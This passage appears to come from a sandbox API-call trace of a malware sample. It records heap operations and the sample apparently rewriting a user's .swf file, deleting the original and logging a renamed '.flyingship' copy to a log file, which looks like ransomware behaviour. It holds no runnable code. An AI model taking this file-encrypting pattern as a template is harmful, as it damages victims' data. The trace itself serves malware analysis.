| out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.640] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e690, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.640] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.640] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.641] WriteFile (in: hFile=0x128, lpBuffer=0x6a0b20*, nNumberOfBytesToWrite=0x68eb, lpNumberOfBytesWritten=0x61e598, lpOverlapped=0x0 | out: lpBuffer=0x6a0b20*, lpNumberOfBytesWritten=0x61e598*=0x68eb, lpOverlapped=0x0) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.641] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.642] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.642] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.642] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.642] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.642] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.642] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.642] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.642] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.642] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.644] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.644] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.644] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.644] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpFilePart=0x0) returned 0x47 [0075.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0xc9dc0080, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 0x6b8b38 [0075.644] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\wwhoeeriour.swf")) returned 1 [0075.646] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0xc9dc0080, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 0 [0075.647] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.647] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.648] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.648] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.648] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.648] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.648] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.648] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.649] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0075.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.649] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.649] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.649] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.649] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.650] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.650] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.650] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x1fc, lpOverlapped=0x0) returned 1 [0075.650] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.651] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.651] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0075.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\n", cchWideChar=85, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0075.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x55) returned 0x674c58 [0075.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\n", cchWideChar=85, lpMultiByteStr=0x674c58, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 85 [0075.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b7b8 [0075.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674c58 | out: hHeap=0x650000) returned 1 [0075.651] WriteFile (in: hFile=0x128, lpBuffer=0x75b7b8*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x75b7b8*, lpNumberOfBytesWritten=0x61eef4*=0x54, lpOverlapped=0x0) returned 1 [0075.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b7b8 | out: hHeap=0x650000) returned 1 [0075.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.651] CloseHandle (hObject=0x128) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.653] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.653] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x699838 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.654] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.654] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.654] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.654] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.654] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.655] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.655] RtlAllocateHeap 